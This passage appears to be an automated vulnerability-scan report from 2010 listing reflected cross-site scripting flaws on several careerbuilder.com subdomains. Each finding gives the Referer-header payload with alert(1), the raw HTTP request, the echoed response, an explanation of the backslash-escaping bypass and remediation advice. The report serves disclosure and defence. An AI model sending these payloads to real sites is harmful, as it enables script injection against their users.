HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 170334
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=22236676820b445c909e30e65e8f79bf-343070903-wh-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650EF11BDE859ABA9A90261078DF30F6939302BEAAAF6D5ADDB3F362D74C5957E210DA2EE94347B60BD; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:22 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:23 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR18
Date: Sun, 14 Nov 2010 22:28:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7f16e\\';alert(1)//9166255ca83'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac4c3\'%3balert(1)//eaade0cb9cb was submitted in the Referer HTTP header. This input was echoed as ac4c3\\';alert(1)//eaade0cb9cb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hc.ic/Florida_Miami/ HTTP/1.1
Host: healthcare.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ac4c3\'%3balert(1)//eaade0cb9cb
Response
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42282
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=1f414345368b4484b11978f8142bfe88-343070839-RT-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6506771D7B630D98E2C8CB55BD83C5ACB7C9A49FC5D48CD69CDCC29AE5D163054B6A25256F1E33A4C02; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:18 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL29
Date: Sun, 14 Nov 2010 22:27:17 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... erver='healthcare'; s_cb.eVar8='healthcare.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ac4c3\\';alert(1)//eaade0cb9cb'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68272\'%3balert(1)//5817376056d was submitted in the Referer HTTP header. This input was echoed as 68272\\';alert(1)//5817376056d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hc.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh039 HTTP/1.1
Host: healthcare.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=68272\'%3balert(1)//5817376056d
Response (redirected)
HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 42283
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=515ec8f819df4c2a8d429d934b081d1c-343070843-RH-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65040AEAF52570DA9D5DB4A733819D02ACFD71E6DE065AEB3F4864BA0F1958561723907E15094A14338; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:27:22 GMT; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL17
Date: Sun, 14 Nov 2010 22:27:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> 404 Fi ...[SNIP]... erver='healthcare'; s_cb.eVar8='healthcare.careerbuilder.com/404.aspx'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 68272\\';alert(1)//5817376056d'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7befc\'%3balert(1)//e0acdb9b82a was submitted in the Referer HTTP header. This input was echoed as 7befc\\';alert(1)//e0acdb9b82a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hr.ic/Florida_Miami/ HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=7befc\'%3balert(1)//e0acdb9b82a
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179875
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=5606b43b8dd342f69498a5b6c0de95cc-343070910-R6-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650C37CB332FDAB9F2B708ED2F7402BA7121C3D3EF92C974470509A0268744A68B47BF198A2C7D24463; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:30 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:30 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL6
Date: Sun, 14 Nov 2010 22:28:30 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 7befc\\';alert(1)//e0acdb9b82a'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83819\'%3balert(1)//8746cb8e2b7 was submitted in the Referer HTTP header. This input was echoed as 83819\\';alert(1)//8746cb8e2b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /hr.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh041 HTTP/1.1
Host: human-resources.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=83819\'%3balert(1)//8746cb8e2b7
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 179814
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=dc54ef0b04d74eb1976108f9e4a21640-343071061-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650BAC105645DC706337E5456437048FD993624CEB11E89408756A5E6B325D6E83890A2FCEBB4CC76B2; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:00 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:01 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:31:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - 83819\\';alert(1)//8746cb8e2b7'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ead14\'%3balert(1)//d413ee6966c was submitted in the Referer HTTP header. This input was echoed as ead14\\';alert(1)//d413ee6966c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /it.ic/Florida_Miami/?lr=cbcb_mh&SiteID=cbcb_mh042 HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ead14\'%3balert(1)//d413ee6966c
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176971
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=16c9edd4c01546239483fde8e118e676-343071061-RK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6502AE2EC89049FE61B8D06E0BA241D3A6963116C55DAC1DC814B322D4EF5C7361F316551F65B2FC7DF; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:31:00 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:46:00 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL20
Date: Sun, 14 Nov 2010 22:31:00 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - ead14\\';alert(1)//d413ee6966c'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb97d\'%3balert(1)//f3a52270f98 was submitted in the Referer HTTP header. This input was echoed as cb97d\\';alert(1)//f3a52270f98 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /it.ic/Florida_Miami/ HTTP/1.1
Host: information-technology.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=cb97d\'%3balert(1)//f3a52270f98
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176751
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=902c2859023d4db993b8e5e2a6697115-343070917-R3-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6508F9889AF47863D42AC9369BF24936EF407DF4271B01B26D33803D513D96BBE0478F239CD3F405291; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:28:37 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:43:37 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL3
Date: Sun, 14 Nov 2010 22:28:37 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... s_cb.eVar8='JS_FindJobs - Job Results'; s_cb.eVar11='NotRegistered'; s_cb.eVar14='Miami, FL'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - cb97d\\';alert(1)//f3a52270f98'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe7d2\'%3balert(1)//c40eaec362e was submitted in the Referer HTTP header. This input was echoed as fe7d2\\';alert(1)//c40eaec362e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /?lr=cbcb_mhf48aa HTTP/1.1
Host: jobs.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=fe7d2\'%3balert(1)//c40eaec362e
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176478
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=25a99fa3ee1e4b068b7ec2cbf7fe3815-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6507146EA23E1EE4D40D495C0361180028DB68A4C29FAD7CFD6464B7AB86D58CEB3EBF9D3F54C7C4D94; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:37:34 GMT; path=/; HttpOnly
Set-Cookie: CB%5FSID=dc7797b2bcdc4ccb9a686a999cbfe5f2-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: CB%5FSID=8fea24ddd8f7452a8758fec70cec2714-343075055-RK-4; domain=.careerbuilder.com; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL20
Date: Sun, 14 Nov 2010 23:37:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='AL Subdomain Home'; s_cb.eVar8='JS_FindJobs - AL Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - fe7d2\\';alert(1)//c40eaec362e'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b7fbe\'%3balert(1)//3fcc9d2eabf was submitted in the Referer HTTP header. This input was echoed as b7fbe\\';alert(1)//3fcc9d2eabf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET / HTTP/1.1
Host: jobs.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=b7fbe\'%3balert(1)//3fcc9d2eabf
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 176477
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: CB%5FSID=aebbe70ee63c4ced8fe0e208d06bf35f-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC6501B089DA72A0005D0B8E47569FB31A1945722B260FB3506C12EC3E1CE7BF29FBDB2FCC225D178F5E1; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 23:27:55 GMT; path=/; HttpOnly
Set-Cookie: CB%5FSID=0651d37f3ffb493d8961c54df23d4579-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: CB%5FSID=b03a40ffb5014396a48a2ab60cb91d59-343074476-R9-4; domain=.careerbuilder.com; path=/; HttpOnly
X-Powered-By: ASP.NET
X-PBY: REBEL9
Date: Sun, 14 Nov 2010 23:27:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Search ...[SNIP]... rop1='AL Subdomain Home'; s_cb.eVar8='JS_FindJobs - AL Subdomain Home'; s_cb.eVar11='NotRegistered'; s_cb.eVar15='NO_NotRegistered'; s_cb.eVar16='natural (google) - b7fbe\\';alert(1)//3fcc9d2eabf'; /************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/ var s_code=s_cb.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 60f15\'%3balert(1)//c9c3d8aec71 was submitted in the Referer HTTP header. This input was echoed as 60f15\\';alert(1)//c9c3d8aec71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /mf.ic/Florida_Miami/ HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=60f15\'%3balert(1)//c9c3d8aec71
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 186571
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
